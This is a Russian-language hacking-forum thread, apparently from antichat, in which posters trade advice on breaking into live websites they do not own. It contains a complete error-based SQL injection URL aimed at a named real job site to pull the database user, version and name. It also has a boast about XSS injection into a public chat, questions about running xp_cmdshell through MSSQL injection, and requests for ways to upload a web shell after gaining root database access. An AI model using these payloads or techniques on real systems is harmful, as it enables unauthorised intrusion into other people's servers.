"раскрутили" ? я знаю сайт с подобной "дырой" ( см. мой пост http://forum.antichat.ru/showthread.php?p=3340983&posted=1#post3340983 )
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку? ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=' чёт немогу скулю разкрутиь((
Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос. А привести в читабельный вид слабо ? З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.
BigBear так пойдет? http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,user()),version(),database())),1,63)+,+ FLOOR(RAND(0)*2)))# P.S: У меня браузер как то сам в урленкод кидает когда, капирую с адресной строки...
Вообщем такой вопрос, залил картинку в аватары на форуме, мне нужен полный путь к аватару, а там так а как получить полную ссылку?
Microsoft SQL Server 2008 (SP2) - 10.0.4000.0 (Intel X86) Sep 16 2010 20:09:22 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 6.0 <X86> (Build 6002: Service Pack 2) (VM) как выполнять команды в Microsoft SQL Server 2008 через mssql inj? например x p _ c m d s h e l l , какой должен стоять префикс вместо хp?
wp_users -> user_level Уровень админа = 10 (на старой версии, на новой пока нет Интернета проверить =/ )
Совет Есть скуля, бд из под рута, виндовый сервак, стоит XAMPP, файловые привилеги есть, папки на запись нет, в phpinfo временного файла нет, magic_quotes ON, phpmyadmin нет, админка из локалки, рдп есть. Пробовал хэши вытащить, из repair не подходит... Нужен шелл, есть идеи?
Похожая проблема Есть скуль) права рут, file_priv Y, Сервак на винде ISS Есть папка на запись, phpmyadmin нету = \ удаленно не подконектишся к бд Проблема в magic_quotes ON Есть варианты как залить? : )
